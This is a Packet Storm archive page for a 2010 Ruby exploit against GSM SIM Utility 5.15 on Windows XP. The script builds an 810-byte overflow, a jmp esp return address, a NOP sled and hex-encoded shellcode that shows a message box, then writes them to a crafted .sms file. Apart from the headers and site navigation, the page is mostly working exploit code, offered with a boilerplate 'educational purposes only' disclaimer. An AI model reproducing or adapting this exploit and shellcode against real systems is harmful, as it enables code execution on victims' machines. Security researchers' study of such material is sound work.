exploit the possibilities

GSM SIM Utility Direct Local Buffer Overflow

GSM SIM Utility Direct Local Buffer Overflow
Posted Jul 8, 2010
Authored by chap0

GSM SIM Utility Direct RET local buffer overflow exploit. Affects version 5.15.

tags | exploit, overflow, local
MD5 | 055a6049a48a76b62d4168f558b26e50

GSM SIM Utility Direct Local Buffer Overflow

Change Mirror Download
# Exploit Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Date : July 07, 2010
# Author : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version : 5.15
# OS : Windows XP SP3
# Greetz to : Special Greetz to Muts, The insperation bro, I do Try Harder
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
#!/usr/bin/ruby
puts '|------------------------------------------------------------------|'
puts '| __ __ |'
puts '| _________ ________ / /___ _____ / /____ ____ _____ ___ |'
puts '| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |'
puts '| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |'
puts '| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |'
puts '| |'
puts '| http://www.corelan.be:8800 |'
puts '| |'
puts '|-------------------------------------------------[ EIP Hunters ]--|'
puts '[*] GSM SIM Utility Local Exploit Direct Ret ver. by chap0.'
puts '[*] Visit seek-truth.net'

crash = "A" * 810
eip = "01524000" #jmp esp
nop = "90" * 10
#message box
code ="d9eb9bd97424f431d2b27a31c964"+
"8b71308b760c8b761c8b46088b7e"+
"208b36384f1875f35901d1ffe160"+
"8b6c24248b453c8b54057801ea8b"+
"4a188b5a2001ebe337498b348b01"+
"ee31ff31c0fcac84c0740ac1cf0d"+
"01c7e9f1ffffff3b7c242875de8b"+
"5a2401eb668b0c4b8b5a1c01eb8b"+
"048b01e88944241c61c3b20829d4"+
"89e589c2688e4e0eec52e89cffff"+
"ff894504bb7ed8e273871c2452e8"+
"8bffffff894508686c6c20ff6833"+
"322e646875736572885c240a89e6"+
"56ff550489c250bba8a24dbc871c"+
"2452e85effffff68703058206820"+
"6368616864206279686f69746568"+
"4578706c31db885c241289e36868"+
"5820206844656174682069732068"+
"2053696e6873206f666857616765"+
"685468652031c9884c241989e131"+
"d252535152ffd031c050ff5508"

payload = crash + eip + nop + code

sms = File.new( "directret.sms", "w" )
if sms
sms.syswrite(payload)
else
puts "Unable to create file."
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    31 Files
  • 8
    Apr 8th
    18 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close